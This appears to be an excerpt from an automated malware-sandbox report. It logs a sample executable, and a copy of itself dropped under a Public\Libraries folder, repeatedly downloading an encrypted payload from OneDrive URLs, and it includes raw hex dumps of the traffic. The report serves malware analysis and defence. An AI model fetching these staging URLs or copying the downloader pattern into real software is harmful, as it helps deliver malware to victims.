                                        2021-09-22 18:59:44 UTC688INData Raw: cf d6 4c de 34 84 67 50 fe 38 a5 08 61 e6 51 68 33 7d 8e be ee 12 60 d1 98 d9 c6 40 db eb c6 f8 6d fc 19 4e fa 34 d9 a9 41 1c e2 6d be ab 5d 93 11 b7 30 e0 39 09 fb e4 41 1c e2 5d 9b 67 a8 a6 ba a4 d9 c1 75 8a 65 8c 81 ab 2a db ae 89 e3 97 19 44 8b 87 f6 2c a8 8e 86 36 aa 43 62 63 b0 e8 4a b3 39 c4 fc 33 27 65 ac 85 9d b6 dd f7 f3 aa c3 3b 3f c1 75 8a 65 fc 76 13 96 37 48 a8 a6 e2 3d 17 6d 16 80 22 82 0b e8 08 0e de 34 84 68 5b 96 d5 ce a9 41 1b 13 89 fb b6 b2 14 7b 99 06 25 20 d7 ca c1 75 8a 65 2c b0 92 e1 6b b9 21 00 d8 27 67 df 6f c2 b2 cc 9d 26 e1 d4 ff fc 33 27 bd 6c 79 b7 b7 5f da 34 61 a3 76 3e 27 25 65 b4 71 c6 42 8f f0 5c 5d 83 5e 1d 4d 08 61 a3 71 de 8c 81 ab 35 4b 73 8e 9e 69 b5 19 76 41 5e 58 08 a9 41 1c fd e0 39 09 fb 24 9e eb a1 0f f0 19 1e
                                        Data Ascii: L4gP8aQh3}`@mN4Am]09A]gue*D,6CbcJ93'e;?uev7H=m"4h[A{% ue,k!'go&3'ly_4av>'%eqB\]^Maq5KsivA^XA9$
                                        2021-09-22 18:59:44 UTC704INData Raw: 5f 7d 94 9f 5b ad b1 17 89 11 80 6f 9a 9b da 69 3e c7 f6 69 4d 05 58 e8 0f 79 d8 ac 3f 1c 06 55 62 de 71 4f 78 16 0b 14 3e 5c 38 43 06 6d 41 3a ce 53 b7 72 21 4d b8 d2 e5 3b af 9e 41 a2 f4 ef 25 65 25 fa fa 80 ec 04 0e 3d ad 8d 80 8b 74 18 44 6f 01 2d cc 31 48 05 8b f7 2b ae 0c e1 78 a9 bf 4a e6 ae 9c ac 07 5c 18 c4 71 05 80 39 b3 a8 b3 88 91 ca 82 6c 45 bd e8 b5 a5 03 f7 03 86 7c 18 09 e3 bf 70 a2 59 54 8c 71 4d a2 3a 31 c5 70 51 68 65 ff fc 36 48 2e ef 87 30 33 33 fb 77 d3 9c a4 b6 d8 a8 da d3 62 28 b9 8c 8e f2 bb ec 95 9e 56 f5 db 67 58 40 d3 da a1 df 3c 09 68 cc f3 ef 07 37 b8 25 a3 3c a7 ee d3 ca 5a 66 4b 14 1a e6 27 68 5d e9 a9 35 37 29 79 8c 8e 86 36 f4 2c b0 90 b1 c2 f7 ab 7e 17 02 14 45 4e fa 31 05 ef d9 e9 f2 50 fe 3a f0 70 44 a4 88 59 92 ce 01
                                        Data Ascii: _}[oi>iMXy?UbqOx>\8CmA:Sr!M;A%e%=tDo-1H+xJ\q9lE|pYTqM:1pQhe6H.033wb(VgX@<h7%<ZfK'h]57)y6,~EN1P:pDY
                                        2021-09-22 18:59:44 UTC720INData Raw: 2b a6 ea 63 ed 5e 4d 50 bb e3 ef fd bd e7 98 bb 2d b9 34 dd f7 60 71 2a ee dc 60 2d 77 58 40 d3 d9 22 ca f6 97 9d 1d e7 c8 ae cc 24 26 a3 f8 6d 9e 13 d9 20 f1 ee a8 da 2c f1 2c bf 19 53 45 55 65 e9 45 99 e0 47 c0 1b 5b 86 31 b0 80 8b ba 6d 52 46 61 5c e7 36 ca e1 44 1a f5 7f 0d bc ce 54 8c 80 0d ed bf 71 c6 00 cf 11 fa 59 e7 f3 e2 3d 55 21 9d 29 05 86 4f 7c 5e 1d be 6b b6 df 8f 8b ff b9 43 c6 a1 2e 43 27 e3 a7 61 28 b3 23 97 e1 30 44 b1 db 56 46 61 f4 32 ee 8b 3b d3 70 cf c1 b6 de cc cc 0a a5 bb 6b c0 33 ba 27 06 8c 76 90 89 11 02 1d cc cd bc 29 c9 55 89 fb f4 65 14 b3 dd b8 94 97 f3 61 c5 78 22 99 f4 e7 ae c0 87 3c 2c d6 f3 69 25 e3 e2 d8 ac 9c fa 2e 44 a1 a4 50 15 02 aa 91 3d bc 29 d6 dd cc 62 ce 41 ba a3 bf 8e 78 28 df 5f cf 7c 1b 80 67 f1 2e 49 07 cf
                                        Data Ascii: +c^MP-4`q*`-wX@"$&m ,,SEUeEG[1mRFa\6DTqY=U!)O|^kC.C'a(#0DVFa2;pk3'v)Ueax"<,i%.DP=)bAx(_|g.I
                                        2021-09-22 18:59:44 UTC736INData Raw: 11 a8 5b 1d 54 59 cd af 1d f0 44 6f c6 43 e9 1b 80 9b 6f 49 39 42 94 93 15 86 f7 ff 88 69 a9 02 a2 4e 04 c9 2f de cb 74 5d cd 67 b0 91 21 e8 eb d0 a4 b6 98 bd 4c fb 7f e5 ae 9c 50 bb e5 cf 6c 7e a5 cc 78 df 93 65 6c be ee 57 8e e3 57 4d f3 34 4a c0 86 70 1b 30 8e f3 22 1e 6e be 38 21 f0 a0 e8 c1 a3 bf 35 37 b7 da 24 eb 5a cc 86 8e 0d 10 3e 5e 4a a7 6f 36 01 51 6c b0 85 62 e5 d4 4e 05 d3 17 90 1a 4b 8c 7e bf 77 3b c2 f7 ab c8 c7 42 6b 7a 01 2c ac a4 35 25 f8 e6 15 3d de f7 b0 6f de 57 0d 8a a5 b3 05 1b 80 a4 ed 95 09 a8 3d 33 e7 43 31 3b 10 fe b9 f4 a7 fc 45 66 6e cd 4c 35 47 2b a6 2a 68 68 6d 41 a0 34 f5 0f f8 3e 5c de bf a9 ca fb 7f b3 05 db ee da ef 49 ac 07 ec c3 79 d0 d4 42 0c e1 ee c7 41 9e 9a a0 dd dd e6 46 e8 4a f2 9f d4 e0 c6 00 50 fe 7a 2e d2 7f
                                        Data Ascii: [TYDoCoI9BiN/t]g!LPl~xelWWM4Jp0"n8!57$Z>^Jo6QlbNK~w;Bkz,5%=oW=3C1;EfnL5G+*hhmA4>\IyBAFJPz.
                                        2021-09-22 18:59:44 UTC752INData Raw: 52 fc 88 a8 37 a0 52 fc 39 b6 35 43 23 37 98 3a cf 26 a3 71 e3 5b 9b a9 56 7f 3d 6e 50 a8 41 6e cb 4d f3 29 a2 66 a5 1e e5 1f 96 67 3b aa 48 34 4a a6 ec 00 c0 30 e3 e1 e4 be 10 a2 70 ac 38 35 13 cb 63 a8 ff d7 dd 13 f8 df b7 1a af 56 06 d6 34 b5 83 d5 ad 1f ec 63 23 da a7 f7 60 f6 e2 1b 7f 3e 52 f3 69 4f f7 32 36 92 d8 74 8d 88 79 d0 d4 42 b9 3d 0e 30 44 b1 d9 51 c5 f5 1b 5e 94 6b fc ff 65 b8 b2 2b 35 c8 c2 7c 95 9f e2 0e be 65 a4 f3 69 4a 0f 22 81 01 2d cd df 3b b8 e1 fb 8a 71 67 b1 e0 39 09 c4 d4 12 fc 61 dd b0 3b 4b 05 a4 49 90 75 c7 ff 7d ea 3a ce 1d 72 ca 1a f4 66 c5 69 c7 02 54 07 df bf 0c eb da 59 6d b2 a9 c2 07 54 dd 39 1a db 56 cf 17 ee dc 65 6c b0 13 a4 53 0e 35 1d 17 53 7a 52 88 85 b7 d4 f9 ba 6c 6b eb 48 2b a6 e3 40 24 61 ea a7 69 b2 a1 c7 c7
                                        Data Ascii: R7R95C#7:&q[V=nPAnM)fg;H4J0p85cV4c#`>RiO26tyB=0DQ^ke+5|eiJ"-;qg9a;KIu}:rfiTYmT9VelS5SzRlkH+@$ai
                                        2021-09-22 18:59:44 UTC768INData Raw: 35 af 3d c9 a9 75 ce 11 b5 4a e5 b6 b8 95 65 cd eb 90 f9 88 17 6b cb ff af 07 d0 19 06 1c bc 2a 3b 50 fe 09 86 07 ac a6 d6 60 26 a3 34 c1 34 f1 52 03 97 28 f3 96 f9 8a 09 90 e3 cc 7f 80 37 2c d5 c2 96 f1 ac a2 c5 10 3a 9a b5 5c 18 c5 4f ec 27 4b 16 f4 17 6b ca 7b b9 34 a5 5d f8 0c 0c 18 e1 cf fa 38 9e bc ea 4f 7c 5a 14 3b 41 4a f1 de 34 c0 f3 e2 3d 55 89 f5 e7 89 a1 53 85 b3 0e 26 a3 75 96 a3 34 80 3e fb f4 25 78 4a f1 9e 92 1e 91 4c cd fb f4 24 a0 85 f2 20 ab 71 c6 40 e5 f4 64 6b e0 d5 a1 6f fc 56 0b a9 71 de 34 c1 75 c3 79 99 2f 40 db ae cc 0d ec 53 85 f2 60 21 18 84 70 05 ea df b7 1e a0 c9 86 74 4d 78 56 4a c1 90 8a 3c e2 69 b5 1b 86 74 4d 78 56 0b e8 4a f9 ef 98 ab 9c e2 3d 55 89 fb f4 64 ea 4f 7c 5e 1d 0f f0 5c 18 84 70 44 e5 c4 bd 5c d5 a1 6e 70 87
                                        Data Ascii: 5=uJek*;P`&44R(7,:\O'Kk{4]8O|Z;AJ4=US&u4>%xJL$ q@dkoVq4uy/@S`!ptMxVJ<itMxVJ=UdO|^\pD\np
                                        2021-09-22 18:59:44 UTC784INData Raw: cf 7c 5e 5d 68 bf c9 86 34 2d c2 4d 2d 32 f8 5a a8 1d 56 f4 9b dd fd 10 73 8b 0c ee ef d9 e9 20 65 16 d5 a1 6a 00 e8 e9 95 ea b0 2f 53 6d be ae 3f 25 98 9b 62 ca f9 55 dc 30 fd cf 20 36 9c 5b 69 4a 8a 95 15 bd 9f 5f 27 25 60 cd 6b 03 83 ee 12 40 6b 1a d1 67 4f 83 7f 0d ec 13 0a 09 5b 96 d7 49 8b 45 33 3f 1c ba 4a 52 5a eb 2e 4b d4 f7 eb 91 ff a4 0e 6e 00 bc 5e a7 69 49 2a 22 65 53 fe 84 98 9b 62 d5 e9 a4 e7 24 15 a8 2e 77 8e df ec 0d 10 36 4e 06 00 d9 aa b6 dd 4e 87 75 33 7a d3 63 57 f2 49 87 a6 46 a8 35 4b 36 4e ac de 40 db 52 7b 5f 97 5c 93 ed 88 f0 ac 4c 2c 3b 06 0e 3f b5 d0 43 a2 3a ce 54 40 d3 b9 9b e2 b6 dd f7 ac cb ae 33 ff 77 d3 d9 ee 47 4e 05 1b 80 67 f5 a0 b9 41 a1 bf 71 d6 e1 e6 1f 48 2e 3f a9 aa 3c 2c e2 02 bd af b1 ad 10 7e 8b 03 93 9c a4 f6
                                        Data Ascii: |^]h4-M-2ZVs ej/Sm?%bU0 6[iJ_'%`k@kgO[IE3?JRZ.Kn^iI*"eSb$.w6NNu3zcWIF5K6N@R{_\L,;?C:T@3wGNgAqH.?<,~
                                        2021-09-22 18:59:44 UTC800INData Raw: 2c c4 34 3f 43 16 c4 d0 c9 a2 4e c4 b8 6b 90 61 a3 34 c1 74 f2 bb 5b 66 a5 6f 94 c0 63 6b e2 63 f7 b1 91 87 f7 58 17 fd fc 03 f2 64 10 8c 87 b2 5e 1a 03 d9 d5 a6 81 16 7f 7e 6c d3 5a 9f d4 e0 c7 24 76 97 92 59 19 dd 81 19 8d f9 64 0e 62 ae 9d 71 90 d9 a9 01 5f 5c 45 3f 00 0b b6 82 a8 35 b3 bd 93 ee c6 b2 3d 96 68 cc 95 95 fd 00 15 70 44 a4 07 a3 5c 08 e8 2e ed 8c db 6e 73 ca ba e0 38 35 bc 71 9f c3 be 65 a7 49 af cb 74 b2 03 ae 24 59 19 fe 2f bd 93 ee ca c7 6a cb ce 9a b6 56 c3 f2 9f d4 84 0a 8d c4 77 83 16 c5 f3 1d f0 a3 21 f0 a0 e8 c1 a3 bf 4b 07 20 10 a8 8d 23 95 71 f6 96 f3 e2 7d 50 8b 97 4c 36 f6 95 50 77 21 93 e8 c1 8d 5e 94 48 de 63 fe 29 d1 5c 9b ce 9a f5 e7 88 f4 64 2e 76 0c 8f 83 b5 05 84 87 b3 dc 31 cc 48 2b 1d 86 12 8f 4d f3 fa f8 91 49 e4 43
                                        Data Ascii: ,4?CNka4t[fockcXd^~lZ$vYdbq_\E?5=hpD\.ns85qeIt$Y/jVw!K #q}PL6Pw!^Hc)\d.v1H+MIC
                                        2021-09-22 18:59:44 UTC816INData Raw: a3 bf 71 83 a8 de 11 0a a5 b3 56 4e bc 8e a3 cb 4b f8 6d fb b2 bc cf 6b 79 53 85 b7 19 6a 12 88 b9 ef d9 ec 15 8d 26 5c d8 ac c7 c7 c4 88 5c e7 08 ea 4f 39 0a 1d 2a 54 c7 09 e3 fa 37 34 e4 be 2e 3f 59 d7 e3 3f 7c a1 ef 52 03 93 57 0a 40 24 5e 96 97 5c 5e 95 30 47 ab ce 11 b0 96 1b 2e 4b b3 dd b2 91 4a 61 86 8b 3f d2 1a cd c9 12 52 fc b6 56 0b ad 0f 68 16 7f 25 ab 45 23 5a 88 5c e7 08 ea 4f 39 0a c5 5b 69 75 44 e4 04 1e 35 66 d1 58 9b 22 df f1 76 74 b2 14 f0 5c 5d dd 1e b4 26 63 23 1c c8 42 50 db 51 40 50 fe 3f 1f a7 19 f9 2f bd 6c 7e 25 98 be 11 35 c8 04 1d 49 d3 b9 9b e2 b6 dd f7 ad 89 de cb 4b f8 6d fb b2 10 56 f4 a4 3d 55 cc 4b bb 4d 87 36 4e fa 34 87 3a eb 2e 74 c6 00 15 bb b8 c4 03 16 0b e8 0f b6 35 66 d1 58 9b 22 df f1 3e f2 9f eb 5a 14 3e 91 d8 02
                                        Data Ascii: qVNKmkySj&\\O9*T74.?Y?|RW@$^\^0G.KJa?RVh%E#Z\O9[iuD5fX"vt\]&c#BPQ@P?/l~%5IKmV=UKM6N4:.t5fX">Z>
                                        2021-09-22 18:59:44 UTC832INData Raw: db ae cc 11 2c 58 d6 a8 ee 57 8e 9c 45 8e 40 50 fe 3a e1 5f 87 b5 9c a4 b6 dd 32 b5 18 43 64 69 3c b5 5b d3 8c b9 c4 3c e0 ee e7 cc 4e 3d 33 2b 6e c9 86 74 4c ba 65 21 18 84 73 db 46 e8 4a f0 10 c9 4f 4f bf fa a9 ca fb 7f b3 05 18 59 79 27 da cc f2 88 ae 7c 5a 52 c4 9a 4a 1a 88 79 d8 4e 42 37 f8 69 f3 25 46 17 fd 18 fb 1c bb 97 da 72 89 ca 09 a3 1b 73 eb 97 de 33 4a f3 1a 0b f8 19 c6 85 0d 13 19 ac 2f 00 af 59 e6 91 bd 68 4d f9 89 fd 71 ff 88 86 8c 02 ab ba 06 8d eb 24 f4 66 c5 8a 17 06 28 a7 79 eb 31 c5 ff f2 8b 09 89 ff 88 ae 7e 67 ce 90 ec 47 2d bb 68 73 e4 35 67 f6 ae cc 0d ec d3 94 d5 66 2e b4 d8 6b 3f d4 22 71 b0 a5 70 bb 97 f8 46 00 66 d1 98 9b 22 1a 0c 65 ec ac 38 2b 6c d3 aa 3c 83 3e fe 7a 30 ba 8c 6e ab 05 d8 53 8b ff fc 77 9f 2d 8e 06 36 b6 0d
                                        Data Ascii: ,XWE@P:_2Cdi<[<N=3+ntLe!sFJOOYy'|ZRJyNB7i%Frs3J/YhMq$f(y1~gG-hs5gf.k?"qpFf"e8+l<>z0nSw-6


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        2 | 192.168.2.4 | 49817 | 40.79.207.82 | 443 | C:\Users\user\Desktop\g4E1F7Lc2O.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        2021-09-22 19:00:43 UTC | 842 | OUT | GET /y4m0xICa2FPeIWKBwiVht4HVgZjzq6LpzHUaJGDOXIHlp4vivbSfkbNqDw-sSDyEHvVJhVrvGVPd33MQ5HcP2SvyM6nlX6xDFoQditiEfVqQqMhE4Qc4N7yYrIrP_ac95EEJY4w_Tu44y8bkCBW_ZAx4xcJq_WAAcWyVvT0AZ3R3TAn9qo4vyG8ttwxtNnpVfUtIbduv9Mkg0VMIjOW8pgqVw/Bkmhwqlbkulnphubkhqeoycsyqhknoi?download&psid=1 HTTP/1.1
                                        User-Agent: zipo
                                        Host: qclcfg.sn.files.1drv.com
                                        Connection: Keep-Alive
                                        2021-09-22 19:00:43 UTC | 842 | IN | HTTP/1.1 200 OK
                                        Cache-Control: public
                                        Content-Length: 844288
                                        Content-Type: application/octet-stream
                                        Content-Location: https://qclcfg.sn.files.1drv.com/y4mWvQKn8A9-lLi8pDJ2mzIAfa341nW_80OcCKUuCUpg8nXLINV6nQIWQdhn8CExDNKcwSeNwu6BX-9xHYJYPpnCWo4AtPshwSIXRuz6OMttTSmhg4gKWmZNXtOqCqtZmBmi22CsfmkXoDNUcEFtTrxSdXRcmY5hfDdPUHwTDYWIxDixONCYp1MV3cNTMxcE4mg
                                        Expires: Tue, 21 Dec 2021 19:00:43 GMT
                                        Last-Modified: Wed, 22 Sep 2021 16:36:46 GMT
                                        Accept-Ranges: bytes
                                        P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                        X-MSNSERVER: SN4PPF3DE00C739
                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                        MS-CV: dLBGW3PbCkGqSB7URRezfw.0
                                        X-SqlDataOrigin: S
                                        CTag: aYzpENjY3NkE5QTYxRTg0MUYzITE1Ny4yNTc
                                        Etag: D6676A9A61E841F3!157.2
                                        X-PreAuthInfo: rv;poba;
                                        Content-Disposition: attachment; filename="Bkmhwqlbkulnphubkhqeoycsyqhknoi"
                                        X-Content-Type-Options: nosniff
                                        X-StreamOrigin: X
                                        X-AsmVersion: UNKNOWN; 19.758.906.2003
                                        Date: Wed, 22 Sep 2021 19:00:43 GMT
                                        Connection: close


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        3 | 192.168.2.4 | 49820 | 40.79.207.82 | 443 | C:\Users\user\Desktop\g4E1F7Lc2O.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        2021-09-22 19:00:45 UTC | 858 | OUT | GET /y4m8yDreFSlMe8bH8Lwd6-50vUmg410-SwSSkigrGueMOAK6vuIcnI70W5Md0Twh3cJHnULU0HiRh-PYsljo5lnqZQ8qZOOWXyBsoFiToXjig3LjJKT1uAnM4DtrAl_czQgTOwCX9PrYAyhISl2Fn91pHYn5jrQb546YqDoVqX62x895dNsKCdnUm7beVR-2GTCGJe71pBq5IyId2FgNqaKnQ/Bkmhwqlbkulnphubkhqeoycsyqhknoi?download&psid=1 HTTP/1.1
                                        User-Agent: zipo
                                        Host: qclcfg.sn.files.1drv.com
                                        Connection: Keep-Alive
                                        2021-09-22 19:00:53 UTC | 875 | IN | HTTP/1.1 200 OK
                                        Cache-Control: public
                                        Content-Length: 844288
                                        Content-Type: application/octet-stream
                                        Content-Location: https://qclcfg.sn.files.1drv.com/y4mWvQKn8A9-lLi8pDJ2mzIAfa341nW_80OcCKUuCUpg8nXLINV6nQIWQdhn8CExDNKcwSeNwu6BX-9xHYJYPpnCWo4AtPshwSIXRuz6OMttTSmhg4gKWmZNXtOqCqtZmBmi22CsfmkXoDNUcEFtTrxSdXRcmY5hfDdPUHwTDYWIxDixONCYp1MV3cNTMxcE4mg
                                        Expires: Tue, 21 Dec 2021 19:00:53 GMT
                                        Last-Modified: Wed, 22 Sep 2021 16:36:46 GMT
                                        Accept-Ranges: bytes
                                        P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                        X-MSNSERVER: SN4PPF829241557
                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                        MS-CV: yDwaJGr7N0qu0nD/wB6vwg.0
                                        X-SqlDataOrigin: S
                                        CTag: aYzpENjY3NkE5QTYxRTg0MUYzITE1Ny4yNTc
                                        Etag: D6676A9A61E841F3!157.2
                                        X-PreAuthInfo: rv;poba;
                                        Content-Disposition: attachment; filename="Bkmhwqlbkulnphubkhqeoycsyqhknoi"
                                        X-Content-Type-Options: nosniff
                                        X-StreamOrigin: X
                                        X-AsmVersion: UNKNOWN; 19.758.906.2003
                                        Date: Wed, 22 Sep 2021 19:00:53 GMT
                                        Connection: close


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        4 | 192.168.2.4 | 49822 | 40.79.207.80 | 443 | C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        2021-09-22 19:00:49 UTC | 858 | OUT | GET /y4mRbmDsFAPLMwkG7lKvJMgSVtNsjr4ltCR3rwxB9MbuFMvkFbdugz3VkrPF6JHEOQjdf1gbwNsmeTew5aBzWEoZ_UUhrtF4cvO0Cy53-UiMu3gc94jsjRZTaQMKMstCGG5ctMtuiFqol2YibfgQivz5qCVOpMFSPRaO4_YtkHijee0swhbUFmx9nPDDBiDGkp_y0eWq5zQ7iQA5M2nHJs6eg/Bkmhwqlbkulnphubkhqeoycsyqhknoi?download&psid=1 HTTP/1.1
                                        User-Agent: zipo
                                        Host: qclcfg.sn.files.1drv.com
                                        Connection: Keep-Alive
                                        2021-09-22 19:00:50 UTC | 859 | IN | HTTP/1.1 200 OK
                                        Cache-Control: public
                                        Content-Length: 844288
                                        Content-Type: application/octet-stream
                                        Content-Location: https://qclcfg.sn.files.1drv.com/y4mWvQKn8A9-lLi8pDJ2mzIAfa341nW_80OcCKUuCUpg8nXLINV6nQIWQdhn8CExDNKcwSeNwu6BX-9xHYJYPpnCWo4AtPshwSIXRuz6OMttTSmhg4gKWmZNXtOqCqtZmBmi22CsfmkXoDNUcEFtTrxSdXRcmY5hfDdPUHwTDYWIxDixONCYp1MV3cNTMxcE4mg
                                        Expires: Tue, 21 Dec 2021 19:00:50 GMT
                                        Last-Modified: Wed, 22 Sep 2021 16:36:46 GMT
                                        Accept-Ranges: bytes
                                        P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                        X-MSNSERVER: SN4PPF33E143135
                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                        MS-CV: t/m58Q0X5Eq8/PmWDT/DVg.0
                                        X-SqlDataOrigin: S
                                        CTag: aYzpENjY3NkE5QTYxRTg0MUYzITE1Ny4yNTc
                                        Etag: D6676A9A61E841F3!157.2
                                        X-PreAuthInfo: rv;poba;
                                        Content-Disposition: attachment; filename="Bkmhwqlbkulnphubkhqeoycsyqhknoi"
                                        X-Content-Type-Options: nosniff
                                        X-StreamOrigin: X
                                        X-AsmVersion: UNKNOWN; 19.758.906.2003
                                        Date: Wed, 22 Sep 2021 19:00:49 GMT
                                        Connection: close


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        5 | 192.168.2.4 | 49825 | 40.79.207.82 | 443 | C:\Users\user\Desktop\g4E1F7Lc2O.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        2021-09-22 19:00:54 UTC | 891 | OUT | GET /y4mpyA5pU3Kf_pjC6vc3DaDBL1qukGX88FVbJzbG-4ODOzUHoYLgFl9XwynneBAFD7G6Sn-Q7msbMnTVXZhDosESPPaWiTuetnYJy5bnKucZ954o3aqcIhCV9qT4DWdA8du81hF2m7lylwbq8oIYpSThnJTSLo0ur1z4CSYglycD241at-IzNZwiJkPHuTR0mG9ZZdPjNei_I_3Uud_L3Bc3g/Bkmhwqlbkulnphubkhqeoycsyqhknoi?download&psid=1 HTTP/1.1
                                        User-Agent: aswe
                                        Cache-Control: no-cache
                                        Host: qclcfg.sn.files.1drv.com
                                        Connection: Keep-Alive
                                        2021-09-22 19:00:55 UTC | 891 | IN | HTTP/1.1 200 OK
                                        Cache-Control: public
                                        Content-Length: 844288
                                        Content-Type: application/octet-stream
                                        Content-Location: https://qclcfg.sn.files.1drv.com/y4mWvQKn8A9-lLi8pDJ2mzIAfa341nW_80OcCKUuCUpg8nXLINV6nQIWQdhn8CExDNKcwSeNwu6BX-9xHYJYPpnCWo4AtPshwSIXRuz6OMttTSmhg4gKWmZNXtOqCqtZmBmi22CsfmkXoDNUcEFtTrxSdXRcmY5hfDdPUHwTDYWIxDixONCYp1MV3cNTMxcE4mg
                                        Expires: Tue, 21 Dec 2021 19:00:55 GMT
                                        Last-Modified: Wed, 22 Sep 2021 16:36:46 GMT
                                        Accept-Ranges: bytes
                                        P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                        X-MSNSERVER: SN4PPF285ED81A5
                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                        MS-CV: +dWEkEj8PU+XJySlGyzCBA.0
                                        X-SqlDataOrigin: S
                                        CTag: aYzpENjY3NkE5QTYxRTg0MUYzITE1Ny4yNTc
                                        Etag: D6676A9A61E841F3!157.2
                                        X-PreAuthInfo: rv;poba;
                                        Content-Disposition: attachment; filename="Bkmhwqlbkulnphubkhqeoycsyqhknoi"
                                        X-Content-Type-Options: nosniff
                                        X-StreamOrigin: X
                                        X-AsmVersion: UNKNOWN; 19.758.906.2003
                                        Date: Wed, 22 Sep 2021 19:00:54 GMT
                                        Connection: close
                                        2021-09-22 19:00:55 UTC1275INData Raw: 13 24 84 4c 5d e3 0d a3 fa 2e 44 84 6c 22 ce 53 9a 06 4f 94 d9 b6 c6 71 ad 8d 46 63 8a ca ec 90 e4 87 ab 71 fb 26 92 2e 7c e7 51 e9 54 db 5d 10 f3 2a 55 93 db 92 11 34 04 8b c8 4d 4c 30 2c eb 6d 8c 90 7c e5 c8 fd 78 ac 9b 65 63 df fe 31 f5 aa ec 2d 49 38 12 7b 6f 83 c9 32 b2 f9 35 75 d9 ab 11 da f6 f6 17 9a dd 51 d8 ee f2 f6 9b 5d 7d 80 d3 2d 1c b4 8a c5 66 e9 39 6f 9b 11 77 1d 6a ce 49 1a 0c 95 78 ab 4d 28 05 35 96 ac db f3 ed c6 d1 c0 a8 e7 05 46 b0 ab 2d a8 f3 e3 e9 10 68 a0 13 ac 3a b4 a8 d4 5a 82 33 ab b7 47 a0 bc e7 3d 4e 20 3f 80 89 53 f2 be 52 5e b5 ee 58 8e bf 90 e8 3c 28 f3 5e 5a b5 42 96 89 65 63 f8 3e f6 a5 4c 3c 70 bf 7c 69 37 d1 4a 41 87 22 6d c0 4a 1e 9a 7c 99 7d 08 fe 10 00 56 86 03 39 11 5d 37 33 c9 e6 bd 67 9f 60 d7 05 b0 10 ee 74 c7 dd
                                        Data Ascii: $L].Dl"SOqFcq&.|QT]*U4ML0,m|xec1-I8{o25uQ]}-f9owjIxM(5F-h:Z3G=N ?SR^X<(^ZBec>L<p|i7JA"mJ|}V9]73g`t
                                        2021-09-22 19:00:55 UTC1291INData Raw: 15 4a 4c 21 0b a5 86 88 fe a7 60 74 dc 98 5b b4 ba ac 44 9a 97 ff 77 67 78 ee 64 64 c7 b5 50 18 70 b8 68 31 b9 c3 e6 6b f9 aa 47 1e fb 6e e8 5c 73 6e 15 16 25 1b 8b 55 8f 8b 60 02 ef 69 86 05 3d 26 32 c1 ea fe 32 f7 69 0d 40 15 b4 ae bc d8 90 06 20 bb 8a 83 f1 dc 5d 58 be e2 ea ab 85 50 a0 db 8c 83 90 59 78 1a 36 ec fe f4 c0 99 66 a8 fd 26 ce e2 da 02 10 95 2c 26 22 44 6d 76 21 e6 64 51 ee 3d 79 48 1c ce d0 d1 48 b1 f8 9e e1 49 e5 3b 79 ae ba 35 76 88 ca 72 89 6c 6f 3b 98 ac 55 4c d8 12 25 b3 74 88 46 b8 f9 71 ed 00 82 9c 41 8b 62 d2 91 6d 84 47 e7 0a 29 fc f8 a5 5a aa ac d9 76 c5 ba 3f dc 38 fe a2 f5 b9 b1 5b 8e 1e da 08 6f dc 32 3f b8 e5 49 7d 12 d5 dd 63 90 7f bc 70 ed 58 5d 9c a9 4b da be c1 73 50 71 c0 be 5c 9c 88 86 05 0f f2 24 dc ad ec 7d fe 4d 36
                                        Data Ascii: JL!`t[DwgxddPph1kGn\sn%U`i=&22i@ ]XPYx6f&,&"Dmv!dQ=yHHI;y5vrlo;UL%tFqAbmG)Zv?8[o2?I}cpX]KsPq\$}M6
                                        2021-09-22 19:00:56 UTC1307INData Raw: 9b 91 62 34 8d 5f 48 32 31 8f c8 ed 5e b9 3e d2 21 76 7e 80 11 09 7e 15 bf 3f 60 91 a9 70 f1 78 de b2 8b 95 b6 da 42 fd 7e 55 1a 0c 18 47 24 46 58 a3 81 4c 70 7c 5b 70 3a 44 88 78 84 c6 e5 c9 a8 28 57 9b 54 9e 01 00 16 3a 1c 3f 6f 87 2f 3c 5a 4f 62 57 b3 2b a8 c0 c0 9c 09 58 ba 74 2e dc 35 87 cf 7a 07 ad b0 22 bd 84 3d 44 6a 43 5e 36 b1 53 7e 60 01 44 12 c5 3b 42 ca b0 ab 7b 50 20 07 5e 39 f6 50 e1 fd d2 56 21 e9 ad c2 65 28 55 c4 56 c2 c0 be 2d 7a 7f aa 55 93 fd 1a 81 b7 57 76 c0 75 45 5d 0a f1 c0 b1 40 da ff 6f 10 56 83 81 46 5a 7a 61 c5 af 15 4f a2 80 b2 d0 c4 57 aa 38 ad ba 1b d8 ef 09 11 d1 5a f7 e6 90 95 93 51 31 4b bd ad e0 a8 d1 26 cb 82 31 b3 a4 68 dc cc 52 a6 48 de 88 7f 97 5f 15 e1 b3 80 b4 84 1b 82 df 13 96 7d 59 f6 1f e3 cd d4 06 12 e8 fb fa
                                        Data Ascii: b4_H21^>!v~~?`pxB~UG$FXLp|[p:Dx(WT:?o/<ZObW+Xt.5z"=DjC^6S~`D;B{P ^9PV!e(UV-zUWvuE]@oVFZzaOW8ZQ1K&1hRH_}Y
